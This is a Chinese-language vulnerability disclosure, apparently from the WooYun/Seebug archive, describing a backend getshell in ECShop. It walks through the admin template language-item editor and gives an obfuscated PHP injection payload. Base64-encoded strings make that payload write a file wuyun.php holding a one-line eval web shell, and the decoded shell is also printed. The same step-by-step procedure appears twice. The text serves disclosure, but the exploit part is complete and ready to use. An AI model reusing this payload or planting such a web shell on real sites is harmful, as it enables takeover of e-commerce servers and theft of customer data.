### 简要描述:
ECShop网店系统最新版-后台getshell
### 详细说明:
不会代码审计,大致过程发下。
最新版:
[<img src="https://images.seebug.org/upload/201312/1320111730aa6f3fe4987c49182c8b4044eb2d11.jpg" alt="ec-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320111730aa6f3fe4987c49182c8b4044eb2d11.jpg)
进入后台打开>模版管理>语言项编辑:
[<img src="https://images.seebug.org/upload/201312/13201129657941089d281f1bb8ea7d79b8b92277.jpg" alt="ec-2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/13201129657941089d281f1bb8ea7d79b8b92277.jpg)
搜索关键字(这里我搜索的字母"p"):
[<img src="https://images.seebug.org/upload/201312/13201140ee476f0b7fca609981cecbd298f2c37b.jpg" alt="ec-3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/13201140ee476f0b7fca609981cecbd298f2c37b.jpg)
插入代码:
```
${${fputs(fopen(base64_decode(d3V5dW4ucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}
```
效果访问生成
[<img src="https://images.seebug.org/upload/201312/1320115706e5c3b09a1c0384a5a4ab654a3dd86d.jpg" alt="ec-4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320115706e5c3b09a1c0384a5a4ab654a3dd86d.jpg)
打开用户登录界面(因为我们添加的地方是用户信息)
[<img src="https://images.seebug.org/upload/201312/1320120456ea6f94b12cad39c6368ceba849ac0a.jpg" alt="ec-5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320120456ea6f94b12cad39c6368ceba849ac0a.jpg)
访问后生成wuyun.php >>
```
<?php eval($_POST[fuck])?>
```
[<img src="https://images.seebug.org/upload/201312/132012172d699b566f7ee4c451008376e8d9bd38.jpg" alt="ec-6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/132012172d699b566f7ee4c451008376e8d9bd38.jpg)
### 漏洞证明:
最新版:
[<img src="https://images.seebug.org/upload/201312/1320111730aa6f3fe4987c49182c8b4044eb2d11.jpg" alt="ec-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320111730aa6f3fe4987c49182c8b4044eb2d11.jpg)
进入后台打开>模版管理>语言项编辑:
[<img src="https://images.seebug.org/upload/201312/13201129657941089d281f1bb8ea7d79b8b92277.jpg" alt="ec-2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/13201129657941089d281f1bb8ea7d79b8b92277.jpg)
搜索关键字(这里我搜索的字母"p"):
[<img src="https://images.seebug.org/upload/201312/13201140ee476f0b7fca609981cecbd298f2c37b.jpg" alt="ec-3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/13201140ee476f0b7fca609981cecbd298f2c37b.jpg)
插入代码:
```
${${fputs(fopen(base64_decode(d3V5dW4ucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}
```
效果访问生成
[<img src="https://images.seebug.org/upload/201312/1320115706e5c3b09a1c0384a5a4ab654a3dd86d.jpg" alt="ec-4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320115706e5c3b09a1c0384a5a4ab654a3dd86d.jpg)
打开用户登录界面(因为我们添加的地方是用户信息)
[<img src="https://images.seebug.org/upload/201312/1320120456ea6f94b12cad39c6368ceba849ac0a.jpg" alt="ec-5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320120456ea6f94b12cad39c6368ceba849ac0a.jpg)
访问后生成wuyun.php >>
```
<?php eval($_POST[fuck])?>
```
[<img src="https://images.seebug.org/upload/201312/132012172d699b566f7ee4c451008376e8d9bd38.jpg" alt="ec-6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/132012172d699b566f7ee4c451008376e8d9bd38.jpg)
京公网安备 11010502034610号
暂无评论